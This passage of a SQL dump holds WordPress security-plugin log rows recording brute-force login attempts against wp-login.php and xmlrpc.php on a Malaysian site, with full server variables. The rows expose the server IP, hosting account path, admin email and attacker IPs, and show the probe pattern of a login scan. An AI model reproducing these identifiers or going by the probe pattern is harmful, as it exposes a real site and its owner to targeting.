empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX7IWYqJrDl1gYLQWcVJAAAAAg\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"198.12.149.33\";s:11:\"REMOTE_PORT\";s:5:\"59338\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX7IWYqJrDl1gYLQWcVJAAAAAg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061665.2762\";s:12:\"REQUEST_TIME\";s:10:\"1569061665\";}}','notice','2019-09-21 10:27:46','2019-09-21 10:27:45',17798976,19289312,'https://bintara.com.my/2019/wp-login.php',1,0,'198.12.149.33'),(25175,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX7HrfBTP0kPOVnb8joGwAAAFc\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.100.99\";s:11:\"REMOTE_PORT\";s:5:\"50810\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX7HrfBTP0kPOVnb8joGwAAAFc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061662.6952\";s:12:\"REQUEST_TIME\";s:10:\"1569061662\";}}','notice','2019-09-21 10:27:44','2019-09-21 10:27:43',17798040,19288360,'https://bintara.com.my/wordpress/wp-login.php',1,0,'166.62.100.99'),(25174,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX69mYqJrDl1gYLQWcU5wAAABc\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"173.236.72.146\";s:11:\"REMOTE_PORT\";s:5:\"58702\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX69mYqJrDl1gYLQWcU5wAAABc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061623.0922\";s:12:\"REQUEST_TIME\";s:10:\"1569061623\";}}','notice','2019-09-21 10:27:05','2019-09-21 10:27:03',18315912,19614488,'https://bintara.com.my/test/xmlrpc.php',1,0,'173.236.72.146'),(25156,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-20 21:40:31','2019-09-20 21:40:29',17755584,18219560,'https://bintara.com.my/robots.txt',1,0,'46.229.168.132'),(25157,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX6ZGYqJrDl1gYLQWcUDQAAAAw\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"146.148.80.88\";s:11:\"REMOTE_PORT\";s:5:\"20488\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX6ZGYqJrDl1gYLQWcUDQAAAAw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061476.7092\";s:12:\"REQUEST_TIME\";s:10:\"1569061476\";}}','notice','2019-09-21 10:24:38','2019-09-21 10:24:37',17798440,19289672,'https://bintara.com.my/test/wp-login.php',1,0,'146.148.80.88'),(25158,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX6Z2YqJrDl1gYLQWcUEgAAAAk\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"146.148.80.88\";s:11:\"REMOTE_PORT\";s:5:\"21914\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX6Z2YqJrDl1gYLQWcUEgAAAAk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061479.6626\";s:12:\"REQUEST_TIME\";s:10:\"1569061479\";}}','notice','2019-09-21 10:24:41','2019-09-21 10:24:40',18316160,19613968,'https://bintara.com.my/test/xmlrpc.php',1,0,'146.148.80.88'),(25159,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX6bmYqJrDl1gYLQWcUIQAAAAk\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"103.5.150.16\";s:11:\"REMOTE_PORT\";s:5:\"43624\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX6bmYqJrDl1gYLQWcUIQAAAAk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569061487.0071\";s:12:\"REQUEST_TIME\";s:10:\"1569061487\";}}','notice','2019-09-21 10:24:48','2019-09-21 10:24:47',17798400,19288824,'https://bintara.com.my/blog/wp-login.php',1,0,'103.5.150.16'),(25160,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX6cbfBTP0kPOVnb8jn@gAAAEw\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"131.255.104.69\";s:11:\"REMOTE_PORT\";s:5:\"44774\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX6cbfBTP0kPOVnb8jn@gAAAEw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569061489.329\";s:12:\"REQUEST_TIME\";s:10:\"1569061489\";}}','notice','2019-09-21 10:24:50','2019-09-21 10:24:49',17795944,19285056,'https://bintara.com.my/wp/wp-login.php',1,0,'131.255.104.69'),(25161,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX6cWYqJrDl1gYLQWcUKAAAABc\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"103.5.150.16\";s:11:\"REMOTE_PORT\";s:5:\"45658\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT